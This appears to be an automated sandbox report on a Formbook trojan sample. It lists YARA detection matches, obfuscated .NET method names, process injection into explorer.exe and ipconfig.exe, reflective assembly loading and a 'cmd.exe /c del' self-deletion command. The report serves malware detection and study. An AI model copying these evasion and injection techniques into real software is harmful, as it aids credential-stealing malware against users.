Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: hj3YCvtlg7.exe PID: 7652, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: hj3YCvtlg7.exe PID: 7832, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: ipconfig.exe PID: 7884, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: hj3YCvtlg7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, M4cKctOuk68Oc7Rd9m.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, M4cKctOuk68Oc7Rd9m.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VrMKeGIZlmivmEjgSP.cs	Security API names: _0020.SetAccessControl
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VrMKeGIZlmivmEjgSP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VrMKeGIZlmivmEjgSP.cs	Security API names: _0020.AddAccessRule
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VrMKeGIZlmivmEjgSP.cs	Security API names: _0020.SetAccessControl
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VrMKeGIZlmivmEjgSP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VrMKeGIZlmivmEjgSP.cs	Security API names: _0020.AddAccessRule
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, M4cKctOuk68Oc7Rd9m.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, M4cKctOuk68Oc7Rd9m.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, M4cKctOuk68Oc7Rd9m.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, M4cKctOuk68Oc7Rd9m.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VrMKeGIZlmivmEjgSP.cs	Security API names: _0020.SetAccessControl
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VrMKeGIZlmivmEjgSP.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VrMKeGIZlmivmEjgSP.cs	Security API names: _0020.AddAccessRule

Source: 0.2.hj3YCvtlg7.exe.2c7fefc.3.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.hj3YCvtlg7.exe.7000000.8.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.hj3YCvtlg7.exe.2c4f170.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.evad.winEXE@12/1@11/6

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hj3YCvtlg7.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03

Source: hj3YCvtlg7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: hj3YCvtlg7.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%

Source: C:\Windows\explorer.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: hj3YCvtlg7.exe	ReversingLabs: Detection: 68%
Source: hj3YCvtlg7.exe	Virustotal: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hj3YCvtlg7.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"	Jump to behavior
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Process created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hj3YCvtlg7.exe"	Jump to behavior

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: hj3YCvtlg7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: hj3YCvtlg7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: hj3YCvtlg7.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: ipconfig.pdb source: hj3YCvtlg7.exe, 00000005.00000002.1405267878.0000000001298000.00000004.00000020.00020000.00000000.sdmp, hj3YCvtlg7.exe, 00000005.00000002.1405192974.0000000001270000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: hj3YCvtlg7.exe, 00000005.00000002.1405267878.0000000001298000.00000004.00000020.00020000.00000000.sdmp, hj3YCvtlg7.exe, 00000005.00000002.1405192974.0000000001270000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: UuoN.pdbSHA256 source: hj3YCvtlg7.exe
Source:	Binary string: wntdll.pdbUGP source: hj3YCvtlg7.exe, 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1406723918.0000000000971000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1404652357.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: hj3YCvtlg7.exe, hj3YCvtlg7.exe, 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1406723918.0000000000971000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1404652357.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: UuoN.pdb source: hj3YCvtlg7.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: hj3YCvtlg7.exe, Form9.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VrMKeGIZlmivmEjgSP.cs	.Net Code: j4yhUticLl System.Reflection.Assembly.Load(byte[])
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VrMKeGIZlmivmEjgSP.cs	.Net Code: j4yhUticLl System.Reflection.Assembly.Load(byte[])
Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VrMKeGIZlmivmEjgSP.cs	.Net Code: j4yhUticLl System.Reflection.Assembly.Load(byte[])
Source: 6.2.explorer.exe.103cf840.0.raw.unpack, Form9.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 7.2.ipconfig.exe.31cf840.3.raw.unpack, Form9.cs	.Net Code: InitializeComponent contains xor as well as GetObject

Source: hj3YCvtlg7.exe

Static PE information: 0x9D7A1105 [Sat Sep 20 23:11:01 2053 UTC]

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_00417090 pushad ; iretd	5_2_00417096
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041E266 push E89010BFh; ret	5_2_0041E582
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041EA1C push dword ptr [D4EF9124h]; ret	5_2_0041EA3E
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041D4B5 push eax; ret	5_2_0041D508
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041D56C push eax; ret	5_2_0041D572
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041D502 push eax; ret	5_2_0041D508
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041D50B push eax; ret	5_2_0041D572
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_00402D89 push ebp; iretd	5_2_00402D8A
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017209AD push ecx; mov dword ptr [esp], ecx	5_2_017209B6
Source: C:\Windows\explorer.exe	Code function: 6_2_0E3B8B1E push esp; retn 0000h	6_2_0E3B8B1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0E3B8B02 push esp; retn 0000h	6_2_0E3B8B03
Source: C:\Windows\explorer.exe	Code function: 6_2_0E3B89B5 push esp; retn 0000h	6_2_0E3B8AE7
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA99B5 push esp; retn 0000h	6_2_0FDA9AE7
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA9B1E push esp; retn 0000h	6_2_0FDA9B1F
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA9B02 push esp; retn 0000h	6_2_0FDA9B03
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_00C7570D push ecx; ret	7_2_00C75720
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02C8225F pushad ; ret	7_2_02C827F9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02C827FA pushad ; ret	7_2_02C827F9
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02C8283D push eax; iretd	7_2_02C82858
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CB09AD push ecx; mov dword ptr [esp], ecx	7_2_02CB09B6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02C81368 push eax; iretd	7_2_02C81369
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02C8106B push edi; retf	7_2_02C8108A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001E7090 pushad ; iretd	7_2_001E7096
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EE266 push E89010BFh; ret	7_2_001EE582
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001ED4B5 push eax; ret	7_2_001ED508
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001ED50B push eax; ret	7_2_001ED572
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001ED502 push eax; ret	7_2_001ED508
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001ED56C push eax; ret	7_2_001ED572
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EEA1C push dword ptr [D4EF9124h]; ret	7_2_001EEA3E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001D2D89 push ebp; iretd	7_2_001D2D8A

Source: hj3YCvtlg7.exe

Static PE information: section name: .text entropy: 7.867960942113154

Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, vSttqFiNx4yhRVEK5W.cs	High entropy of concatenated method names: 'm3XfCQnLOP', 'NGJfjUKHQm', 'WC75mn8IXw', 'LPb5Sttem3', 'wiQ5WyyVCt', 'XTA56D6q60', 'qt75Qptlm0', 'KhU5ec1iIH', 'jX25iGscUg', 'JEG5tgJ88V'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, zkamj8fyjUFsj4DNVS.cs	High entropy of concatenated method names: 'T9KqZtaMNo', 'sPgq36TnD4', 'MYS7xZNbc6', 'JCF7rvGX4i', 'b17qaDh6Iu', 'tF8qDdmDF9', 'XLYq4osAtj', 'ULXqOFLmHe', 'XxhqbVHVLG', 'uTaq2YpC89'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, RlRY3MtuqSyeeD1ltL.cs	High entropy of concatenated method names: 'ToString', 'qwj1aL01yV', 'kkE1K2Rsn2', 'V1N1mTKqOi', 'j1G1SA0hEp', 'SEp1WMBLoQ', 'xch169Gv2N', 'S431QrGxpP', 'Xuu1ey0DRQ', 'sIF1iVl4ux'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, oYWDQbVoSt3rrZLCP8.cs	High entropy of concatenated method names: 'yt1AXmx4UQ', 'wdkAph5j0n', 'nJsAUf9fpr', 'WwjAcXP9ix', 'NfVACGw2RJ', 'QpNARW7Dtr', 'Hc6Ajb4dHa', 'j6MA8jcHiA', 'vyRAvW8nRd', 'sMiAHgveJd'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, TFoKLcY3ARFt2FB1fbQ.cs	High entropy of concatenated method names: 'XRkTX6NFGT', 'i86TpXDhV5', 'wDWTU8MlAQ', 'kqKTceFNia', 'DQsTCEAUBq', 'uVwTRAASCl', 'gvFTjNdNFC', 'y4hT8VEdDs', 'cKbTvHCQJm', 'pLETHJy9nu'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VktMXjAK6HSiWFAtLS.cs	High entropy of concatenated method names: 'wHCY8qqT55', 'ffkYvmean9', 'pCSYIZaEgW', 'n4EYKs7w8s', 'N0MYSKn3PD', 'i1GYWAhIgh', 'mmiYQo5k3v', 'rCNYeXhxDF', 'FegYtxMKpD', 'F8vYaVo77j'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, I75gnI2kL9ppKmFoA0.cs	High entropy of concatenated method names: 'k5LGVUVHKE', 'VEpGyepvK6', 'vNdGfKFpCI', 'THjGAJunZh', 'W25GFa2QQu', 'UTBfExLqAr', 'FaMfPhQgVP', 'DGcfJQ9vsh', 'tBgfZZDTaA', 'erjfkvnNRh'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, NaFpgHhPZjkBVhYoCC.cs	High entropy of concatenated method names: 'ynbrAQDJhx', 'GnBrFK1EgR', 'BAArlwXhlr', 'Om0rwyA7wq', 'viIroROMNh', 'sTtr1uLZZt', 'rMAEsmpER2dbrwEyqe', 'Dy7X9UG637MJvHo02T', 'VGGrrclxpT', 'FKtrNFpmVJ'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, lrimIHsJxt3UWxuIeo.cs	High entropy of concatenated method names: 'ED9ql7aGMW', 'tiBqwGbYL2', 'ToString', 'lHFqLcHiEh', 'npkqyck6O3', 'ijbq5W6Q46', 'XsbqfoLdZd', 'LOQqGhUAPc', 'VkEqA26P4e', 'J6BqFTEG8w'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, lZf4Py4jUCe74NUT5g.cs	High entropy of concatenated method names: 'Dispose', 'KrurkHxmUd', 'mTrgKZE4JS', 'fcnnnW0ij5', 'U7Nr33Qnc7', 'QERrzmXV33', 'ProcessDialogKey', 'I1YgxCAJTx', 'FJSgrwQfFS', 'zJTggUxrUN'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, BbLeYsClKqdpZlysFh.cs	High entropy of concatenated method names: 'gw65cWBvRI', 'bw15RFeHTY', 'brL58UWuI8', 'SIJ5vimvkl', 'uEw5oSC66t', 'TKw516XRH3', 'IWF5qCjXM4', 'MuK57Rnh6H', 'BDP5TKrDfo', 'no859DjbU4'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, M4cKctOuk68Oc7Rd9m.cs	High entropy of concatenated method names: 'EikyO6siUJ', 'KWpyboqm5I', 'dBWy2THbTO', 'XMgy0kZKpa', 'YWfyEW0qC2', 'SkvyPK9WUD', 'YWuyJOkjxL', 'cIwyZLsNnb', 'kaUykWaySn', 'gyJy38YOh6'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, iAtTLKaUooI6ORehwu.cs	High entropy of concatenated method names: 'GgTALJLdTW', 'HiOA5Ino3C', 'x8LAGbw44b', 'rCMG3wBxc4', 'x36GzBngBv', 's64AxJR6al', 'QbpArnWTLr', 'cL8Ag5FWr3', 'Yu5ANIWWIQ', 'KbuAhP7MN7'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, EjsN49YM3I6qvqaWLoa.cs	High entropy of concatenated method names: 'KhY9XqsybY', 'nnm9pH5bRT', 'XCM9UOp17M', 'yZ0m0kDpg8e921wDiAk', 'JI7FvWDGhYU5itT3Efq', 'u4tcOrDlJhg7dTfQtZL', 'juAG4PDykS7SCHLvNUQ'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VrMKeGIZlmivmEjgSP.cs	High entropy of concatenated method names: 'QBKNVLSOJs', 'MFKNLdH62T', 'hSoNyFbeLB', 'jbvN5i6AfB', 'TlGNfEoLIT', 'lL5NGA77Qm', 'CvNNASva04', 'ITmNFNeICa', 'anMNsU2P4x', 'uKSNlerWqL'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, rW5l9Ror7rYmm0uNHK.cs	High entropy of concatenated method names: 'it07IXZTGZ', 'l8k7K6H973', 'Spw7mrhjJq', 'jWs7S3JpH0', 'xJu7O8EICS', 'gW97W8xCRu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, xrCaFdyNl8mr4igEg1.cs	High entropy of concatenated method names: 'Of17LnT9Tt', 'MfY7yCTtQp', 'sr2759SDZg', 'xel7fD6l0m', 'tDU7GXsZ1h', 'TAe7Ara46A', 'KAp7FxWess', 'KjD7sxTZ9Q', 'Xy07lvm6N9', 'nNA7wvpbP5'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, PwqSttQ2Ue8TWoP6rF.cs	High entropy of concatenated method names: 'ghgTr0O3Pe', 'VqLTNluQAT', 'dDTThVJ4Db', 'BGbTLf64RB', 'HO9TyYc0hn', 'otTTftfhGm', 'XxxTGHpMf7', 'Sdq7Jmfxhg', 'Y2l7ZNOnM4', 'Ir07kXZ0a1'
Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, ntQV3lM3nQNvti1MVn.cs	High entropy of concatenated method names: 'xXAU1kRUS', 'n5dcn2axI', 'qpsRpcedq', 'q11j1btCM', 'z0Nv1bUOD', 'k9vHSF1LB', 'VkTrtFAfCGP9inkfFY', 'AY84bgueJl1WBJC3xh', 'kuJ7HaS67', 'gAi9k85iV'
Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, vSttqFiNx4yhRVEK5W.cs	High entropy of concatenated method names: 'm3XfCQnLOP', 'NGJfjUKHQm', 'WC75mn8IXw', 'LPb5Sttem3', 'wiQ5WyyVCt', 'XTA56D6q60', 'qt75Qptlm0', 'KhU5ec1iIH', 'jX25iGscUg', 'JEG5tgJ88V'
